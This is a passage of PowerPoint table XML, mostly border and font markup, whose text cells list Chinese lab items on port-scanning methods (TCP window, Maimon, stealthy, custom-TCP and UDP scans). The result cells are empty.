                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>5.TCP窗口值判断的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>6.TCPMaimon主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>7.隐蔽的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>8.自定义TCP协议的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="292100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>9.UDP协议的主机端口扫描并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
